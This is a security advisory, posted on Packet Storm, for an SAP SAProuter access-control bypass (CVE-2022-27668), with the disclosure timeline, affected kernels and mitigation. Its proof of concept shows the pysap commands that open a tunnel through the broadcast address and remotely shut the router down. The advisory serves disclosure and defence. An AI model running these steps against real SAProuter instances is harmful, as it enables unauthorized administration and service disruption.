what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SAP SAProuter Improper Access Control

SAP SAProuter Improper Access Control
Posted Sep 16, 2022
Authored by Fabian Hagg | Site sec-consult.com

SAP SAProuter suffers from an improper access control vulnerability where permitting loopback traffic can lead to unexpected behavior.

tags | exploit
advisories | CVE-2022-27668
SHA-256 | 91240243e7e61439bb89c02bbb4588f61e70077ca27fc537904e51613f2c8bd3

SAP SAProuter Improper Access Control

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20220914-0 >
title: Improper Access Control
product: SAP® SAProuter
vulnerable version: see section "Vulnerable / tested versions"
fixed version: see SAP security note 3158375
CVE number: CVE-2022-27668
impact: high
homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html
found: 2022-02-25
by: Fabian Hagg (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America



Vendor description:
"SAProuter is a software application that provides a remote connection
between our customer's network and SAP. SAProuter can be used to:

- Improve network security, e.g.by using a password or by only allowing
encrypted connections from known sources
- Control and log the connections to your SAP system
- Set up an indirect connection when programs involved cannot
communicate with each other due to the network configuration
- Increase performance and stability by reducing the SAP system workload
within a local area network (LAN) when communicating with a wide area
network (WAN)" [1]

[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html

Business recommendation:
SEC Consult recommends to implement the security note 3158375, where the
documented issue is fixed according to the vendor. We advise installing the
correction as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:
1) Improper Access Control (CVE-2022-27668)
According to SAP note 1853140: "in the default configuration, the
SAProuter does not allow a route to itself. You can explicitly permit
the 'loopback' from the SAProuter to itself using option -X".

It has been identified that under certain circumstances, this is not
valid and may lead to unexpected behavior. External attackers having
network-wise access to a (weakly configured) SAProuter instance can
exploit an improper access control vulnerability by sending packets
of type NI_ROUTE in order to establish a tunnel that allows to manage
the SAProuter externally even when it was started without option -X.

This enables an attacker to send packets of type ROUTER_ADM in order to
gain unauthorized access to administrative functions such as stopping
the remote SAProuter instance, displaying connection information,
switching trace level, or terminating a specific connection.

Proof of concept:
1) Improper Access Control (CVE-2022-27668)
For successful exploitation of this vulnerability, the following prerequisites
must be met:

- Route permission table saprouttab must contain an entry that
explicitly permits external hosts to connect to port 3299 of
arbitrary hosts. Some examples of such entries are shown in
the following listing:

P <source-host incl. attacker-controlled machine> * 3299
P <source-host incl. attacker-controlled machine> * 3200.3300

- SAProuter is running (option -X does not need to be set) and the
attacker has network-wise access to its listening port.

The vulnerability can be verified by means of the publicly available
Python script router_portfw.py [2] of the open source pysap framework
developed by M. Gallo. The script, which is based on a scapy re-implementation
of the proprietary SAP Router protocol, allows for port forwarding through
a SAProuter service.

For demonstration purposes, the following simplified lab setup is used:

SAProuter (IPv4: <-----> Attacker (IPv4:
SAProuter started with option -r: | Pysap framework
./saprouter -r |
Content of saprouttab in workdir: |
P * 3299 |

The following listing shows that it is not possible to establish a
"loopback" tunnel through the remote SAProuter service by specifying a
target destination host (option -t) and target destination
port 3299 (option -r). As expected, this route is filtered and denied
by default even when explicitly allowed through the route permission

attacker@$ python router_portfw.py -d -p 3299
-t -r 3299 -a -l 3299 -v
[*] Setting a proxy between and remote SAP Router 192.168.
56.103:3299 (talk mode raw)
SAPNIProxy: Binded to address, proxying to
Routing to
To send 61 bytes data + 4 bytes NI header
Received 4 bytes NI header, to receive 211 bytes data
Received 211 bytes data
Route request to not accepted by

It was discovered that it is possible to circumvent this check using
the non-standard IPv4 broadcast address (see RFC5735, RFC1122).
When specifying destination host and destination port 3299,
this leads to an effective access control bypass as can be seen in the
following listing.

attacker@$ python router_portfw.py -d -p 3299
-t -r 3299 -a -l 3299 -v
[*] Setting a proxy between and remote SAP Router 192.168.
56.103:3299 (talk mode raw)
SAPNIProxy: Binded to address, proxying to
Routing to
To send 59 bytes data + 4 bytes NI header
Received 4 bytes NI header, to receive 8 bytes data
Received 8 bytes data
Route request to accepted by

attacker@$ ss -antlp | grep "3299"
LISTEN 0 5* users:(("python",pid=1985,fd=3))

Once the tunnel is established, an attacker can leverage administrative
functions using its local port 3299 which is forwarded to the loopback
interface of the remote SAProuter instance. For example, the Python
script router_admin.py [3] of the pysap framework can be used to
shutdown (option -s) the running SAProuter instance on the remote host.

attacker@$ python router_admin.py -s -d -p 3299
[*] Requesting stop of the remote SAP Router
[*] Connected to the SAP Router
[*] Using SAP Router version 40
[*] Sending Router Admin packet

netwadm@$ ./saprouter -r

trcfile dev_rout
no logging active

WARNING: wildcard character used in route target

shutdown message received, good bye ...

External links:
[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py
[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py

Vulnerable / tested versions:
The following versions of the binary were found to be vulnerable during our tests:

- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)
- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)

No additional testing on other releases has been carried out. According to the vendor
the following releases and versions are affected by the discovered vulnerability:

- KRNL64NUC 7.49
- KRNL64UC 7.49
- KERNEL 7.49
- KERNEL 7.77
- KERNEL 7.81
- KERNEL 7.85
- KERNEL 7.86
- KERNEL 7.87
- KERNEL 7.88

Vendor contact timeline:
2022-02-25: Contacting vendor through vulnerability submission web form.
2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.
2022-04-04: Requesting status update.
2022-04-05: Vendor confirms vulnerability and states that a fix is already
complete. The corresponding security note is expected to be
released with the upcoming April 2022 patch day.
2022-04-12: Patch day April 2022 passed without release.
2022-05-10: Patch day May 2022 passed without release.
2022-06-14: Vendor releases patch with SAP Security Note 3158375.
2022-06-14: Requesting confirmation that the finding was fixed by the
published security note as no prior notification was provided.
2022-06-28: Vendor confirms that the patch included in Security Note 3158375
fixes the issue. The vulnerability got assigned CVE-2022-27668.
2022-09-14: Release of this security advisory.

The vendor provides a patched version which should be installed immediately.
The software can be obtained via the SAP service marketplace. Further
information can be found in the corresponding Security Note 3158375 [4].

[4] https://launchpad.support.sap.com/#/notes/3158375

Remove any wildcard (*) values in the target host or IP address directive
in route permission table saprouttab entries 'P' and 'S'. In general, it
is recommended to not make use of any wildcard values in the route permission
table saprouttab. Additional information on the secure configuration of
SAProuter can be found in SAP Security Note/KBA 1895350 [5].

[5] https://launchpad.support.sap.com/#/notes/1895350

Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF F. Hagg / @2022

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By